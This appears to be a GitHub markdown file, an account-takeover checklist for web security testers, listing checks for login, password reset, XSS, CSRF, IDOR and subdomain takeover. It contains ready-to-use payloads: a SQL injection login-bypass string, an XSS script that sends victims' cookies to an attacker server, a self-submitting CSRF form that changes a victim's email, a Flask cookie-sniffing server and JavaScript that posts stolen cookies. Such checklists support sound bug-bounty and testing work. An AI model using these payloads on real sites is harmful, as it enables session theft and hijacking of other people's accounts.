Skip to content

Latest commit

 

History

History
120 lines (86 loc) · 3.91 KB

account_takeover_checklist.md

File metadata and controls

120 lines (86 loc) · 3.91 KB

Account Takeover Checklist

  • login:

    • check if you are able to brute force the password

    • Test for OAuth misconfigurations

    • check if you are able to bruteforce the login OTP

    • check for JWT mesconfigurations

    • Test for SQL injection to bypass authentication

      admin" or 1=1;--

    • check if the application validates the OTP or Token

  • password reset:

    • check if you are able to brute force the password reset OTP

    • test for token predectability

    • test for JWT misconfigurations

    • check if the password reset endpoint is vulnerable to IDOR

    • check if the password reset endpoint is vulnerable to Host Header injection

    • check if the password reset endpoint is leaking the token or OTP in the HTTP response

    • check if the application validates the OTP or Token

    • test for HTTP parameter Pollution (HPP)

  • XSS to Account Takeover

    • if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password

    • try to exfiltrate the cookies

    • try to exfiltrate the Auth Token

    • if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies

    • PoC Example:

      <script>
    /*
    this script will create a hidden <img> element
    when the browser tries to load the image
    the victim's cookies will be sent to your server
    */

    var new_img = document.createElement('img');
    new_img.src = "http://yourserver/" + document.cookie;
    new_img.style = 'display: none;'
    document.body.appendChild(new_img);
</script>

  • CSRF to Account Takeover

    • check if the email update endpoint is vulnerable to CSRF

    • check if the password change endpoint is vulnerable to CSRF

    • PoC Example:

          <html>
        <head>
            <title>CSRF PoC</title>    
        <head>
        <body>
            <form name='attack' action='https://example.com/update-email' method='POST'>
                <input type="hidden" name="new_email" value="[email protected]">
                <input type="submit" name="submit" value="submit" hidden>
            <form>
            <script>
                document.attack.submit.click()
            </script>
        </body>
    </html>

  • IDOR to Account Takerover

    • checck if the email update endpoint is vulnerable to IDOR

    • check if the password change endpoint is vulnerable to IDOR

    • check if the password reset endpoint vulnerable to IDOR

  • subdomain takeover:

    • first-order: check if you can takeover xyz.example.com, you can host any malicious code to steal users info or cookies
    • PoC Example 
      #!/usr/bin/python3
from flask import *

app = Flask(__name__)

@app.route('/')
def cookie_sniffer():
    for c_name, c_value in request.cookies.items():
        print(c_name + ': ' + c_value)
    return 'Hello, world'
if __name__ == '__main__':
    app.run(port=80)
    • second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can takeover this domain, you can host any malicious javascript file and use it to steal users info or cookies
    • PoC Example 
      user_cookies = {
    "cookies": document.cookie
}

var xhttp = new XMLHttpRequest();
xhttp.open("POST", "/store-cookies", true);
xhttp.send(JSON.stringify(user_cookies));